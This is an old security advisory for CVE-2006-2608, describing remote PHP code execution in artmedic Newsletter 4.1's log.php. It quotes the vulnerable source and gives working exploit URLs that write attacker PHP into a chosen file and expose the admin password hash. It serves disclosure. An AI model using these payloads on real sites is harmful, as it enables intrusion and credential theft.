Bug: Remote Code Execution in artmedic Newsletter 4.1 [log.php] ( Ascii Version )

Search:
WLB2

Remote Code Execution in artmedic Newsletter 4.1 [log.php]

Published
Credit
Risk
2006.05.27
C.Schmitz
High
CWE
CVE
Local
Remote
N/A
CVE-2006-2608
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
5.1/10
6.4/10
4.9/10
Exploit range
Attack complexity
Authentication
Remote
High
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

I found a bug in artmedic Newsletter 4.1 (proably even in newer versions) which lets an attacker run arbitrary php-code
and bypass the password protection.

The reason for this is mistake in design.

log.php:

<?php

$time = time();

$date = date("d.m.Y, H:i:s");

$remote = getenv("REMOTE_ADDR");

$ip = getHostByAddr($remote);

$logd =
"$time"."&&"."$date"."&&"."$remote"."&&&q
uot;."$ip"."&&"."$email"."&&n";

$logdaten = fopen("$logfile", "a+");

flock($logdaten,2);

fputs($logdaten, $logd);

flock($logdaten,3);

fclose($logdaten);

//Log-Daten nach Vorhaltezeit löschen

//Delete old logdata

$ablaufzeit = "$time"-"$logtime";

$pruefung = @file($logfile);

while (list ($line_num, $line) = @each ($pruefung))

{

$zeiten = explode("&&",$line);

if($zeiten[0] <= $ablaufzeit)

{

$fp = fopen( "$logfile", "r" );

$contents = fread($fp, filesize($daten));

fclose($fp);

$line=quotemeta($line);

$string2 = "";

$replace = ereg_replace($line, $string2, $contents);

$fh=fopen($logfile, "w+");

@flock($fp,2);

fputs($fh, $replace);

@flock($fp,3);

fclose($fh);

}}

?>

Usually the log.php is included and $logfile,$logtime and $email are declared in the parent document. If we run
"log.php?logfile=anyfile.anyext&logtime=unixtimestamp>0&email=<-- insert php code here -->"
we get a file anyfile.anyext with following content:

<html>

...

unixtimestamp&&date&&user.host&&user.ip&&<-- php code -->&&

...

</html>

a simple example to reveal the admin pw Hash is

log.php?logfile=info.php&logtime=000060&email=<?%20require($cur);%20echo
%20$password%20?>

just launch info.php?cur=include.php and you will see it.

to kill the entry type:

"log.php?logfile=info.php&logtime=000000"

vendor has not yet been informed, but he will be as soon as possible ...

regards

C.Schmitz

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version